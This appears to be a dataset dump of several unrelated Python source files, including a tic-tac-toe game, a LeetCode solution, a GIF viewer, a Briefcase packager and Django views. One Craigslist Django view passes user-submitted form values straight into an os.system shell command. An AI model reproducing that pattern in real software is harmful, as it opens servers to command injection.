morpion=terrain[i]\n \n t=False\n \n if j==0 :\n \thoz = morpion[i][1]==player and morpion[i][2]==player\n \tvect = morpion[i][3]==player and morpion[i][6]==player\n \tdig = morpion[i][4]==player and morpion[i][8]==player\n \t\n if hoz or vect or dig:\n t=True\n \n if j==1 :\n \thoz = morpion[i][2]==player and morpion[i][0]==player\n \tvect = morpion[i][4]==player and morpion[i][7]==player\n \n if hoz or vect:\n t=True\n \n if j==2 :\n \thoz = morpion[i][1]==player and morpion[i][0]==player\n \tvect = morpion[i][5]==player and morpion[i][8]==player\n \tdig = morpion[i][4]==player and morpion[i][6]==player\n \t\n \tif hoz or vect or dig:\n t=True\n \t\n if j==3 :\n \thoz = morpion[i][4]==player and morpion[i][5]==player\n \tvect = morpion[i][0]==player and morpion[i][6]==player\n \t\n \tif hoz or vect or:\n t=True\n \n if j==4 :\n \thoz = morpion[i][3]==player and morpion[i][5]==player\n \tvect = morpion[i][1]==player and morpion[i][7]==player\n \tdig = morpion[i][0]==player and morpion[i][8]==player\n \tdig2 = morpion[i][2]==player and morpion[i][6]==player\n \t\n \tif hoz or vect or dig or dig2:\n t=True\n \n if j==5 :\n \thoz = morpion[i][4]==player and morpion[i][3]==player\n \tvect = morpion[i][2]==player and morpion[i][8]==player\n \t\n \tif hoz or vec:\n t=True\n \t\n if j==6 :\n \thoz = morpion[i][7]==player and morpion[i][8]==player\n \tvect = morpion[i][0]==player and morpion[i][3]==player\n \tdig = morpion[i][4]==player and morpion[i][2]==player\n \t\n \t\t\n \tif hoz or vec or dig:\n t=True\n \n if j==7 :\n \thoz = morpion[i][6]==player and morpion[i][8]==player\n \tvect = morpion[i][1]==player and morpion[i][4]==player\n\n \tif hoz or vec:\n t=True\n \t\n if j==8 :\n \thoz = morpion[i][6]==player and morpion[i][7]==player\n \tvect = morpion[i][5]==player and morpion[i][2]==player\n \tdig = morpion[i][4]==player and morpion[i][0]==player\n \t\n \tif hoz or vec or dig:\n t=True\n \n return t\n '''\n\ndef fh(state,j):\n if pos_gagne(state):\n nbr_vict_local[j]=nbr_vict_local[j]+1\n return 1\n else:\n return nbr_vict_local[j] \n \ndef alphabeta(state):\n \"\"\" implementation de alphabeta, version Russel & Norvig, Chapter 6\n \"\"\"\n v = maxValue(state,-inf,inf)\n return v\n \ndef maxValue(state,alpha,beta):\n if feuille(state): # si feuille on renvoie la valeur\n return valeur[state]\n v = -inf\n for s in successeurs[state]:\n print (\"étendu noeud \", s)\n v = max(v,minValue(s,alpha,beta))\n if v >= beta: # coupe beta, pas la peine d'étendre les autres fils\n print (\"coupe beta\")\n return v\n alpha = max(alpha,v) # mise à jour de alpha par MAX\n return v \n \ndef minValue(state,alpha,beta):\n if feuille(state): # si feuille on renvoie la valeur\n return valeur[state]\n v = inf\n for s in successeurs[state]:\n print (\"étendu noeud \", s)\n v = min(v,maxValue(s,alpha,beta))\n if v <= alpha: # coupe alpha, pas la peine d'étendre les autres fils\n print (\"coupe alpha\")\n return v\n beta = min(beta,v)\n return v\n \ndef feuille(state): # les feuilles n'apparaissent pas comme clés dans mon dictionnaire successeurs\n return state not in successeurs \n \ndef main():\n\n #for arg in sys.argv:\n iterations = 500 # default\n if len(sys.argv) == 2:\n iterations = int(sys.argv[1])\n print (\"Iterations: \")\n print (iterations)\n \n mur = [False] * 20\n vide= [False] + [True] * 17 + [False, False]\n first=[False, True,True,False, False,True, False, False, False, True,False,False,False,True,False,False,True,True, False, False]\n sec=[False, True,True,False,True,True,True, False, True,True,True,False,True,True,True,False,True,True, False, False]\n \n mat=np.array((mur,vide,vide,first,sec,vide,sec,first,sec,vide,sec,first,sec,vide,sec,first,vide,vide, mur, mur)) # matrice représentant la map\n\n init()\n\n \n\n \n #-------------------------------\n # Initialisation\n #-------------------------------\n \n players = [o for o in game.layers['joueur']]\n nbPlayers = len(players)\n scores = [0]*nbPlayers\n #fioles = {} # dictionnaire (x,y)->couleur pour les fioles\n \n \n # on localise tous les états initiaux (loc du joueur)\n initStates = [o.get_rowcol() for o in game.layers['joueur']]\n # print (\"Init states:\", initStates)\n \n \n # on localise tous les objets ramassables\n #goalStates = [o.get_rowcol() for o in game.layers['ramassable']]\n #print (\"Goal states:\", goalStates)\n \n # on localise tous les murs\n wallStates = [w.get_rowcol() for w in game.layers['obstacle']]\n # et la zone de jeu pour le tic-tac-toe\n tictactoeStates = [(x,y) for x in range(3,16) for y in range(3,16)]\n #print (\"Wall states:\", wallStates)\n # print(tictactoeStates)\n # les coordonnees des tiles dans la fiche\n tile_fiole_jaune = (19,1)\n tile_fiole_bleue = (20,1)\n \n # listes des objets fioles jaunes et bleues\n \n fiolesJaunes = [f for f in game.layers['ramassable'] if f.tileid==tile_fiole_jaune]\n fiolesBleues = [f for f in game.layers['ramassable'] if f.tileid==tile_fiole_bleue] \n all_fioles = (fiolesJaunes,fiolesBleues) \n fiole_a_ramasser = (0,0) # servira à repérer la prochaine fiole à prendre\n \n # renvoie la couleur d'une fiole\n # potentiellement utile\n \n def couleur(o):\n if o.tileid==tile_fiole_jaune:\n return 'jaune'\n elif o.tileid==tile_fiole_bleue:\n return 'bleue'\n \n \n #-------------------------------\n # Placement aleatoire d'une fioles de couleur \n #-------------------------------\n \n def put_next_fiole(j,t):\n o = all_fioles[j][t]\n \n # et on met cette fiole qqpart au hasard\n \n x = random.randint(1,19)\n y = random.randint(1,19)\n \n while (x,y) in tictactoeStates or (x,y) in wallStates: # ... mais pas sur un mur\n x = random.randint(1,19)\n y = random.randint(1,19)\n o.set_rowcol(x,y)\n # on ajoute cette fiole dans le dictionnaire\n #fioles[(x,y)]=couleur(o)\n \n game.layers['ramassable'].add(o)\n game.mainiteration()\n return (x,y)\n \n \n def get_path(noeudFinal, posInit):\n chemin = [] \n \n pere = noeudFinal\n while pere.etat != posInit:\n chemin.append(pere.etat)\n pere = pere.pere\n \n return reversed(chemin)\n\n def go_to_position(posPlayer, player, chemin):\n for pos in chemin:\n row = pos[0]\n col = pos[1]\n player.set_rowcol(row, col)\n \n game.mainiteration()\n\n posPlayer=(row,col)\n\n return posPlayer\n \n def update_scores(score, j, morpions, terrains_jeu, terrain):\n fin = False\n t = terrains_jeu[terrain] # dernier terrain où le joueur a joué \n v = False\n \n # lignes\n if t[0] == t[1] == t[2] == j: # 1ère ligne remplie\n v = True\n if t[3] == t[4] == t[5] == j:\n v = True\n if t[6] == t[7] == t[8] == j:\n v = True\n \n # colonnes\n if t[0] == t[3] == t[6] == j:\n v = True\n if t[1] == t[4] == t[7] == j:\n v = True\n if t[2] == t[5] == t[8] == j:\n v = True\n \n # diagonales\n if t[0] == t[4] == t[8] == j:\n v = True\n if t[2] == t[4] == t[6] == j:\n v = True\n \n if v: # le joueur a gagné le terrain\n morpions[terrain] = j\n v = False\n score += 1\n \n if terrain in [0, 1, 2] and morpions[0] == morpions[1] == morpions[2]: # 1ère lignée de terrain marquée\n v = True\n if terrain in [3, 4, 5] and morpions[3] == morpions[4] == morpions[5]:\n v = True\n if terrain in [6, 7, 8] and morpions[6] == morpions[7] == morpions[8]:\n v = True\n if terrain in [0, 3, 6] and morpions[0] == morpions[3] == morpions[6]: # 1ère colonne de terrain marquée\n v = True\n if terrain in [1, 4, 7] and morpions[1] == morpions[4] == morpions[7]:\n v = True\n if terrain in [2, 5, 8] and morpions[2] == morpions[5] == morpions[8]:\n v = True\n \n if v:\n fin = True\n \n \n return fin, score, morpions, terrains_jeu\n \n #-------------------------------\n # Boucle principale de déplacements, un joueur apres l'autre\n #-------------------------------\n \n posPlayers = initStates\n print(posPlayers)\n tour = 0 \n j = 1 # le joueur 0 commence\n # on place la premiere fiole jaune \n\n fiole_a_ramasser = put_next_fiole(0,tour) \n\n morpions = [0] * 9 # les 9 terrains de jeu, 0: match non terminé, 1: joueur 1 a gagné, 2: joueur 2 a gagné\n terrains_jeu = [\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0]\n ] # terrains de jeux, 0: case libre, 1: case occupée par le joueur 1, 2:case occupée par le joueur 2\n \n terrain = random.randint(0,8) # terrain où va jouer le premier joueur \n \n dict_terrains = {\n (0,0): (4, 4), (0,1): (4,5) ,(0,2): (4,6), (0,3): (5, 4), (0,4): (5, 5), (0,5): (5, 6), (0,6): (6, 4), (0,7): (6,5),(0,8): (6, 6),\n (1,0): (4, 8), (1,1): (4,9) ,(1,2): (4,10), (1,3): (5, 8), (1,4): (5, 9), (1,5): (5, 10), (1,6): (6, 8), (1,7): (6,9),(1,8): (6, 10),\n (2,0): (4, 12), (2,1): (4,13) ,(2,2): (4,14), (2,3): (5, 12), (2,4): (5, 13), (2,5): (5, 14), (2,6): (6, 12), (2,7): (6,13),(2,8): (6, 14),\n (3,0): (8, 4), (3,1): (8,5) ,(3,2): (8,6), (3,3): (9, 4), (3,4): (9, 5), (3,5): (9, 6), (3,6): (10, 4), (3,7): (10,5),(3,8): (10, 6),\n (4,0): (8, 8), (4,1): (8,9) ,(4,2): (8,10), (4,3): (9, 8), (4,4): (9, 9), (4,5): (9, 10), (4,6): (10, 8), (4,7): (10,9),(4,8): (10, 10), \n (5,0): (8, 12), (5,1): (8,13) ,(5,2): (8,14), (5,3): (9, 12), (5,4): (9, 13), (5,5): (9, 14), (5,6): (10, 12), (5,7): (10,13),(5,8): (10, 14),\n (6,0): (12, 4), (6,1): (12,5) ,(6,2): (12,6), (6,3): (13, 4), (6,4): (13, 5), (6,5): (13, 6), (6,6): (14, 4), (6,7): (14,5),(6,8): (14, 6),\n (7,0): (12, 8), (7,1): (12,9) ,(7,2): (12,10), (7,3): (13, 8), (7,4): (13, 9), (7,5): (13, 10), (7,6): (14, 8), (7,7): (14,9),(7,8): (14, 10),\n (8,0): (12, 12), (8,1): (12,13) ,(8,2): (12,14), (8,3): (13, 12), (8,4): (13, 13), (8,5): (13, 14), (8,6): (14, 12), (8,7): (14,13),(8,8): (14, 14)\n }\n # dictionnaire (terrain, case du terrain) => case dans mat\n for i in range(iterations):\n print(\"Position joueur 0 : \", posPlayers[j])\n print(\"Position fiole : \", fiole_a_ramasser)\n \n p2 = ProblemeGrid2D(posPlayers[j],fiole_a_ramasser,mat,'manhattan')\n noeudFinal = probleme.astar(p2)\n chemin = get_path(noeudFinal, posPlayers[j])\n posPlayers[j] = go_to_position(posPlayers[j], players[j], chemin)\n o = players[j].ramasse(game.layers) # on ramasse la fiole \n game.mainiteration()\n print (\"Objet de couleur \", couleur(o), \" trouvé par le joueur \", j)\n \n \n '''\n while True: # tant qu'on tombe sur une case occupée\n random_case = random.randint(0,8) # case du terrain où va jouer le joueur \n if (terrains_jeu[terrain][random_case] == 0): # case libre\n break\n \n '''\n pos_but = dict_terrains[(terrain, random_case)] # la case où doit aller le personnage\n p2 = ProblemeGrid2D(posPlayers[j],pos_but,mat,'manhattan')\n noeudFinal = probleme.astar(p2)\n \n chemin = get_path(noeudFinal, posPlayers[j])\n \n posPlayers[j] = go_to_position(posPlayers[j], players[j], chemin)\n\n players[j].depose(game.layers)\n game.mainiteration()\n print(\"Le joueur \", j, \" a déposé sa fiole en \", pos_but)\n terrains_jeu[terrain][random_case] = j+1 # la case est marquée\n\n fin, scores[j], morpions, terrains_jeu = update_scores(scores[j], j+1, morpions, terrains_jeu, terrain) # maj des scores \n \n if fin: # l'un des joueurs à gagner\n break\n # on active le joueur suivant\n # et on place la fiole suivante\n \n \n fiole_a_ramasser=put_next_fiole(j,tour) \n terrain = random_case # prochain terrain\n \n if not 0 in morpions: # tous les match sont terminés\n print(\"Partie terminée\")\n break\n game.mainiteration()\n while morpions[terrain] != 0: # terrain déjà gagné par un des deux joueurs\n terrain = random.randint(0, 8) # choix aléatoire d'un autre terrain\n\n #break\"\"\"\n j = (j+1)%2 \n if j == 0:\n tour+=1\n\n \n print(\"Scores : \", scores)\n if scores[0] > scores[1]:\n print(\"Le joueur 1 a gagné\")\n elif scores[0] < scores[1]:\n print(\"Le joueur 2 a gagné\")\n else:\n print(\"Egalité\")\n # pygame.quit()\n \n \n\nif __name__ == '__main__':\n main()\n \n\n\n","sub_path":"pySpriteWorld-forStudents/UltimateTicTacToe-new.py","file_name":"UltimateTicTacToe-new.py","file_ext":"py","file_size_in_byte":15377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"378925118","text":"'''\n\nDescription:\n\nWrite a function that reverses a string. The input string is given as an array of characters char[].\n\nDo not allocate extra space for another array, you must do this by modifying the input array in-place with O(1) extra memory.\n\nYou may assume all the characters consist of printable ascii characters.\n\n \n\nExample 1:\n\nInput: [\"h\",\"e\",\"l\",\"l\",\"o\"]\nOutput: [\"o\",\"l\",\"l\",\"e\",\"h\"]\n\n\n\nExample 2:\n\nInput: [\"H\",\"a\",\"n\",\"n\",\"a\",\"h\"]\nOutput: [\"h\",\"a\",\"n\",\"n\",\"a\",\"H\"]\n\n'''\n\n\n\nfrom typing import List\n\n\nclass Solution:\n def reverseString(self, s: List[str]) -> None:\n \n size = len(s)\n\t\t\n\t\t# reverse string by mirror image\n for i in range(size//2):\n s[i], s[-i-1] = s[-i-1], s[i]\n\n\n\n# n : the length of input char array, s\n\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of linear iteration, which is of O( n )\n\n## Space Complexity: O( 1 )\n#\n# The overhead in space is the storage for temporary variable, which is of O( 1 )\n\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'test_char_array' )\n\ndef test_bench():\n\n test_data = [\n TestEntry( test_char_array = [\"h\",\"e\",\"l\",\"l\",\"o\"] ),\n TestEntry( test_char_array = [\"H\",\"a\",\"n\",\"n\",\"a\",\"h\"] ),\n ]\n\n # expected output:\n '''\n ['o', 'l', 'l', 'e', 'h']\n ['h', 'a', 'n', 'n', 'a', 'H']\n '''\n\n for t in test_data:\n\n Solution().reverseString( t.test_char_array )\n print(t.test_char_array)\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","sub_path":"2020_June_Leetcode_30_days_challenge/Week_1_Reverse String/by_mirror_image.py","file_name":"by_mirror_image.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"510438650","text":"import open3d as o3d\r\nimport numpy as np\r\ndef pca_compute(data, sort=True):\r\n average_data = np.mean(data, axis=0)\r\n decentration_matrix = data - average_data\r\n H = np.dot(decentration_matrix.T, decentration_matrix)\r\n eigenvectors, eigenvalues, eigenvectors_T = np.linalg.svd(H)\r\n if sort:\r\n sort = eigenvalues.argsort()[::-1]\r\n eigenvectors = eigenvectors[:, sort]\r\n return eigenvectors, average_data\r\nif __name__ == '__main__':\r\n pcd = o3d.io.read_point_cloud(\"Original.pcd\")\r\n points = np.asarray(pcd.points)\r\n v, c = pca_compute(points)\r\n coefficients = v[:, 2]\r\n A = coefficients[0]\r\n B = coefficients[1]\r\n C = coefficients[2]\r\n D = -(A * c[0] + B * c[1] + C * c[2])\r\n print('Equation:%.6f * x + %.6f * y + %.6f*z + %.6f = 0' % (A, B, C, D))\r\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188324606","text":"import os\nimport distutils.command.install_scripts as orig\nfrom pkg_resources import Distribution, PathMetadata\nimport shutil\nimport subprocess\nimport sys\n\nfrom .app import app\n\n\nclass windows(app):\n description = \"Create a Windows installer to wrap this project\"\n\n def finalize_options(self):\n # Copy over all the options from the base 'app' command\n finalized = self.get_finalized_command('app')\n for attr in ('formal_name', 'organization_name', 'bundle', 'icon', 'guid', 'splash', 'download_dir'):\n if getattr(self, attr) is None:\n setattr(self, attr, getattr(finalized, attr))\n\n super(windows, self).finalize_options()\n\n # Set platform-specific options\n self.platform = 'Windows'\n self.support_project = \"pybee/Python-Microsoft-Support\"\n\n if self.dir is None:\n self.dir = 'windows'\n\n self.resource_dir = self.dir\n self.support_dir = os.path.join(self.dir, 'python')\n\n iconfile = '%s.ico' % self.icon\n self.icon_filename = os.path.join(self.app_dir, self.distribution.get_name() + os.path.splitext(iconfile)[1])\n\n def install_icon(self):\n shutil.copyfile('%s.ico' % self.icon, self.icon_filename)\n\n def install_splash(self):\n raise RuntimeError(\"Windows doesn't support splash screens.\")\n\n def find_support_pkg(self):\n version = \"%s.%s.%s\" % sys.version_info[:3]\n return 'https://www.python.org/ftp/python/%s/python-%s-embed-amd64.zip' % (version, version)\n\n def install_extras(self):\n print(\" * Creating application link...\")\n subprocess.Popen([\"powershell\", \"-File\", \"make_link.ps1\"], cwd=os.path.abspath(self.dir)).wait()\n os.remove(os.path.join(os.path.abspath(self.dir), 'make_link.ps1'))\n","sub_path":"briefcase/windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"646258652","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n__author__ = '@l0x6c'\n__version__ = '0.1.3'\n\nimport os\nimport sys\n\nfrom PyQt4.QtCore import Qt, QSize\nfrom PyQt4.QtGui import QMainWindow, QApplication, QLabel, QMovie\n\nclass GIFLabel(QLabel):\n def __init__(self, file_name=None):\n super(GIFLabel, self).__init__()\n\n if file_name != None:\n self.set_movie(file_name)\n\n def set_movie(self, file_name):\n movie = QMovie(file_name)\n movie.start()\n\n self.setMovie(movie)\n size = movie.currentImage().size()\n\n width = size.width()\n height = size.height()\n\n self.size = (width, height)\n\nclass Lain(QMainWindow):\n def __init__(self, path):\n super(Lain, self).__init__()\n\n self.setWindowFlags(Qt.FramelessWindowHint)\n self.setAttribute(Qt.WA_TranslucentBackground)\n\n self.gif_files = [\n os.path.join(path, item) for item in sorted(os.listdir(path))\n if item.split('.')[-1].lower() == 'gif'\n ]\n\n self.gif_label = GIFLabel()\n self.setCentralWidget(self.gif_label)\n\n self.current_gif = -1\n self.next_gif()\n\n def set_gif(self, file_name):\n self.gif_label.set_movie(file_name)\n self.resize(*self.gif_label.size)\n\n def next_gif(self):\n self.current_gif += 1\n\n if self.current_gif not in range(0, len(self.gif_files)):\n self.current_gif = 0\n\n self.set_gif(self.gif_files[self.current_gif])\n\n def previous_gif(self):\n self.current_gif -= 1\n\n if self.current_gif not in range(0, len(self.gif_files)):\n self.current_gif = len(self.gif_files) - 1\n\n self.set_gif(self.gif_files[self.current_gif])\n\n def mousePressEvent(self, event):\n self.x = event.pos().x()\n self.y = event.pos().y()\n\n def mouseReleaseEvent(self, event):\n self.x = None\n self.y = None\n\n def mouseMoveEvent(self, event):\n deltax = event.pos().x() - self.x\n deltay = event.pos().y() - self.y\n\n x = self.pos().x() + deltax\n y = self.pos().y() + deltay\n\n self.move(x, y)\n\n def keyPressEvent(self, event):\n key_dict = {\n 16777216: sys.exit, # ESC key\n 16777236: self.next_gif, # Right arrow\n 16777234: self.previous_gif # Left arrow\n }\n\n return key_dict.get(event.key(), lambda: None)()\n\nif __name__ == '__main__':\n if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:\n print('Usage: {} {} PATH'.format(sys.executable, sys.argv[0]))\n sys.exit()\n\n app = QApplication([])\n lain = Lain(sys.argv[1]); lain.show()\n sys.exit(app.exec_())","sub_path":"lain.py","file_name":"lain.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"118499259","text":"from scipy.io.wavfile import write\n\nimport sequence_generation as seqgen\nimport tone_generation as tonegen\nimport numpy as np\n\nFs = 44100 \ntone_duration = 1/6\nn = 30\nn_repetitions = 5\n\nspectral_conditions = ['high', 'low', 'passive']\n\ndef generate_stimulus(target_band='high', Fs=Fs, tone_duration=tone_duration, distractor_volume=1):\n \n target_trials, targets = seqgen.generate_single_band(n_repetitions=n_repetitions, n=n)\n distractor_trials, distractors = seqgen.generate_single_band(n_repetitions=n_repetitions, n=n)\n\n if target_band == 'high':\n waveform = tonegen.generate_tone_sequence(distractor_trials, target_trials, target_band, distractor_volume)\n elif target_band == 'low':\n waveform = tonegen.generate_tone_sequence(target_trials, distractor_trials, target_band, distractor_volume)\n elif target_band == 'passive':\n waveform = tonegen.generate_tone_sequence(distractor_trials, target_trials, target_band, distractor_volume)\n\n target_list = list([int(np.floor(x*8*tone_duration*1000)+1000) for x in targets])\n distractor_list = list([int(np.floor(x*8*tone_duration*1000)+1000) for x in distractors])\n json_output = '{\\n\\t\\\"targetData\\\":' + str(target_list).replace(' ', '') + ',\\n\\t\\\"distractorData\\\":' + str(distractor_list).replace(' ', '') + '\\n}'\n \n return(waveform, json_output)\n\nn_blocks = int(input(\"How many blocks for each frequency? \"))\n\nsilence = np.zeros(44100) # this is a hack because sound presentation in PsychoPy cuts off the first click\nfor i in spectral_conditions:\n for j in range(n_blocks):\n stimulus, json = generate_stimulus(target_band=i)\n stimulus = np.asarray(stimulus, dtype='float32')\n click = np.ones(20)\n trial_length = int(stimulus.shape[0] / n)\n click = np.append(click, np.zeros(trial_length - 20))\n click = np.tile(click,30)\n stimulus = np.append(silence, stimulus)\n click = np.append(silence, click)\n stimulus = np.array([stimulus, click], np.float32)\n stimulus = stimulus.conj().T\n write('output/' + i + '_' + str(j+1) + '.wav', Fs, stimulus)\n f = open('output/' + i + '_' + str(j+1) + \".json\", \"w\")\n f.write(json)\n f.close()\n \n # write one-band only training\n stimulus, json = generate_stimulus(target_band=i, distractor_volume=0)\n stimulus = np.asarray(stimulus, dtype='float32')\n stimulus = np.append(silence, stimulus)\n write('output/' + i + '_training_1' + '.wav', Fs, stimulus)\n f = open('output/' + i + '_training_1' + \".json\", \"w\")\n f.write(json)\n f.close()\n\n # write half-volume training\n stimulus, json = generate_stimulus(target_band=i, distractor_volume=0.5)\n stimulus = np.asarray(stimulus, dtype='float32')\n stimulus = np.append(silence, stimulus)\n write('output/' + i + '_training_2' + '.wav', Fs, stimulus)\n f = open('output/' + i + '_training_2' + \".json\", \"w\")\n f.write(json)\n f.close()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"439186084","text":"import os\nimport yaml\n\n\n\nclass Dog:\n def __init__(self, command, list, file, verbose):\n self.file = file\n self.verbose = verbose\n self.list = list\n\n if self.file not in os.listdir():\n print(f\"Couldn't find '{self.file}' in current working directory\")\n exit(1)\n\n self.info: dict = {}\n with open(self.file, 'r') as f:\n self.info: dict = yaml.load(f, Loader=yaml.FullLoader)\n\n if 'commands' not in self.info:\n print(f\"Please supply commands in the '{self.file}' dog file\")\n exit(1)\n\n if self.list:\n self.show_list()\n exit(0)\n\n self.run_command(command)\n \n def show_list(self):\n print(\"List of available commands:\\n\")\n for cmd in self.info['commands']:\n print(f\" {cmd}\")\n if 'description' in self.info['commands'][cmd]:\n print(f\" {self.info['commands'][cmd]['description']}\")\n \n print()\n print(\"usage: ``dog COMMAND``\")\n\n def run_command(self, command):\n if self.verbose: print(f\"Running DOG command: {command}\")\n\n if command not in self.info['commands']:\n print(f\"Command '{command}' not found in dog file: '{self.file}'\")\n print(\"For a list of commands run ``dog --list`` \")\n exit(1)\n\n code = [line.strip() for line in str(self.info['commands'][command]['code']).split(\";\")]\n\n while \"\" in code:\n code.remove(\"\")\n\n for line in code:\n if self.verbose:\n print()\n print(\"$ \" + line.replace('\\n', '\\\\n'))\n os.system(line)\n","sub_path":"dogmodule/dog.py","file_name":"dog.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"223866554","text":"# from django.shortcuts import render\r\n# from scrapy_app import emails\r\n# import os\r\n# from craigslist.utils import start_urls_maker\r\n#\r\n# def index(request):\r\n# \treturn render(request, \"home.html\")\r\n#\r\n# def action(request):\r\n# \tmodel = request.POST.get(\"model\")\r\n# \temail = request.POST.get(\"email\")\r\n# \tmini = request.POST.get(\"min\")\r\n# \tmaxi = request.POST.get(\"max\")\r\n# \turls = start_urls_maker(model)\r\n# \t# os.system(\"cd.. & cd scrappy_app & dir\")\r\n# \tos.system(\"cd scrapy_app & rm ./cars.csv & scrapy crawl cars -o cars.csv -t csv -a mini={0} -a maxi={1} -a model={2}\".format(mini, maxi, model))\r\n# \tos.system(\"cd scrapy_app & python ./emails.py %s\" % email)\r\n# \treturn render(request, \"success.html\")\r\n\r\n\r\nfrom django.shortcuts import render\r\nimport os\r\nfrom craigslist.utils import start_urls_maker\r\nfrom django.views.decorators.csrf import csrf_exempt\r\n\r\n\r\n@csrf_exempt\r\ndef index(request):\r\n\treturn render(request, \"home.html\")\r\n\r\n\r\n@csrf_exempt\r\ndef action(request):\r\n\tip = request.META.get('REMOTE_ADDR')\r\n\tmodel = request.POST.get(\"model\")\r\n\tmini = request.POST.get(\"min\")\r\n\tmaxi = request.POST.get(\"max\")\r\n\r\n\t# os.system(\"cd.. & cd scrappy_app & dir\")\r\n\t# print(os.system(\"pwd\"))\r\n\r\n\tos.system(\r\n\t\t\"cd scrapy_app & del cars.csv & scrapy crawl cars -o cars.csv -t csv -a q={0} -a mini={1} -a maxi={2}\".format(model, mini, maxi))\r\n\r\n\t# os.system(\"cd. & cd scrapy_app & dir\")\r\n\t# with open(\"cars.csv\", \"r\") as file:\r\n\t# \tlines = file.readlines()\r\n\t# \tprint(lines)\r\n\t# os.system(\"cd scrapy_app & python emails.py %s\" % email)\r\n\treturn render(request, \"success.html\")\r\n","sub_path":"craigslist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"77968265","text":"from django.shortcuts import render, render_to_response, HttpResponse, HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth import login, authenticate\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\n\nfrom .models import GithubUser\n\nimport requests\nimport json\n\ndef home(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect(reverse('profile'))\n else:\n return render_to_response('home.html', context=RequestContext(request, {'client_id':settings.CLIENT_ID}))\n\ndef github_oauth(request):\n \"\"\"\n Method which authenticate a user using github and creates a django user\n \"\"\"\n token = request.GET.get('code')\n github_user = GithubUser()\n access_token = github_user.get_access_token(token)\n if access_token:\n try:\n data = github_user.get_user_details(access_token)\n email = data.get('email')\n user = GithubUser.objects.get(email=email)\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n login(request, user)\n except ObjectDoesNotExist:\n email = data.get('email')\n first_name = data.get('name')\n avatar_url = data.get('avatar_url')\n profile_url = data.get('html_url')\n username = data.get('login')\n user = GithubUser.objects.create_user(email=email, username=username, first_name=first_name, avatar_url=avatar_url,\n profile_url=profile_url, access_token=access_token)\n user.save()\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n login(request, user)\n return HttpResponseRedirect(reverse('profile'))\n\n@login_required(login_url='/')\ndef profile(request):\n \"\"\"\n View which shows user profile and allows user to create repository\n \"\"\"\n return render_to_response('profile.html', context=RequestContext(request, {}))\n\n@login_required\ndef create_repo(request):\n \"\"\"\n Service which creates a Github repo\n \"\"\"\n repo_name = request.POST.get('repo_name')\n repo_description = request.POST.get('repo_description')\n repo_type = request.POST.get('repo_type')\n github_user = GithubUser()\n repo = github_user.create_github_repo(repo_name, repo_description, repo_type, request.user)\n if repo == True:\n return HttpResponse(json.dumps({\"result\":\"success\", \"message\":\"success\"}))\n else:\n return HttpResponse(json.dumps({\"result\":\"fail\", \"message\":repo}))\n\n@login_required\ndef logout_view(request):\n \"\"\"\n Logouts current user\n \"\"\"\n logout(request)\n return HttpResponseRedirect(reverse('home'))\n\n","sub_path":"github/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"631385804","text":"class Solution:\n \n def pacificAtlantic(self, heights: List[List[int]]) -> List[List[int]]:\n pacific, atlantic = set(), set()\n m, n = len(heights), len(heights[0])\n for i in range(m):\n self.dfs(heights, i, 0, 0, pacific)\n self.dfs(heights, i, n - 1, 0, atlantic)\n for j in range(n):\n self.dfs(heights, 0, j, 0, pacific)\n self.dfs(heights, m - 1, j, 0, atlantic)\n return list(map(list, list(pacific & atlantic)))\n \n \n def dfs(self, heights, x, y, height, visited):\n m, n = len(heights), len(heights[0])\n if x < 0 or y < 0 or x >= m or y >= n or (x, y) in visited:\n return\n if heights[x][y] < height:\n return\n visited.add((x, y))\n for a, b in [[x - 1, y], [x, y - 1], [x + 1, y], [x, y + 1]]:\n self.dfs(heights, a, b, heights[x][y], visited)\n\n","sub_path":"417_pacific_atlantic_water_flow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"224612176","text":"'''\nInput: a List of integers\nReturns: a List of integers\n'''\ndef moving_zeroes(arr):\n # Declare two working lists (arrays)\n wrk_arr1 = []\n wrk_arr2 = []\n\n # Iterate through the array\n for 